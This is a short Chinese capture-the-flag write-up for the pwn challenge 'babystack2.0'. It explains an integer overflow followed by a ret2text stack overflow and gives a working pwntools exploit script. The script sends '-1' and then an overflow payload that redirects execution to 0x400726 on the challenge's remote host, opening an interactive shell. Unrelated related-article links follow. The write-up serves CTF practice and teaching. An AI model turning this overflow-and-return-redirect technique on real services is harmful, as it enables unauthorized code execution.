babystack2.0-入土为安的第十六天

简介: babystack2.0-入土为安的第十六天

checksec pwn

整数溢出

ret2text

栈溢出

这行代码等待服务器发送包含 'your name:' 的提示,然后发送字符串 '-1'。这通常用于触发程序接收用户名的部分。

这行代码在收到包含 "name?" 的提示后,发送前面构造的载荷 payload。这通常用来触发某种缓冲区溢出或其他漏洞,进而将控制权转移到你指定的地址(0x400726

from pwn import*
p=remote("node4.anna.nssctf.cn",28324)
p.sendlineafter('your name:',b'-1')
payload=b'b'*(0x10+8)+p64(0x400726)
p.sendlineafter("name?",payload)
p.interactive()

目录
相关文章
|
6天前
第十四问:预编译头是什么?有什么用?
预编译头文件(PCH)通过预先编译常用且不常改变的头文件,减少重复编译,显著提高大型项目的编译速度。它还支持模块化开发,隐藏实现细节,增强代码的安全性和可维护性。即使是小型项目,预编译头也有助于未来的扩展和维护。
17 0
|
6月前
|
算法 图计算
力扣经典150题第十六题:接雨水
力扣经典150题第十六题:接雨水
32 0
HMI-36-【节能模式】开搞
今天主要是准备工作,先把运动模式中的接口都搬运过来,这样在主仪表中都可以把节能模式都的调用都写进去了。
HMI-36-【节能模式】开搞
星际争霸之小霸王之小蜜蜂(十二)--猫有九条命
星际争霸之小霸王之小蜜蜂(十二)--猫有九条命
|
物联网 iOS开发
【捷径技巧】贴一下就能收能量,捷径还能这么玩!
【捷径技巧】贴一下就能收能量,捷径还能这么玩!
2389 0
【捷径技巧】贴一下就能收能量,捷径还能这么玩!
蓝桥杯之单片机学习(二十四)——自写模板库
蓝桥杯之单片机学习(二十四)——自写模板库
152 0
|
存储
【锟斤拷�⊠是怎样炼成的】——两分钟帮你彻底弄懂计算机的编码原理
【锟斤拷�⊠是怎样炼成的】——两分钟帮你彻底弄懂计算机的编码原理
217 0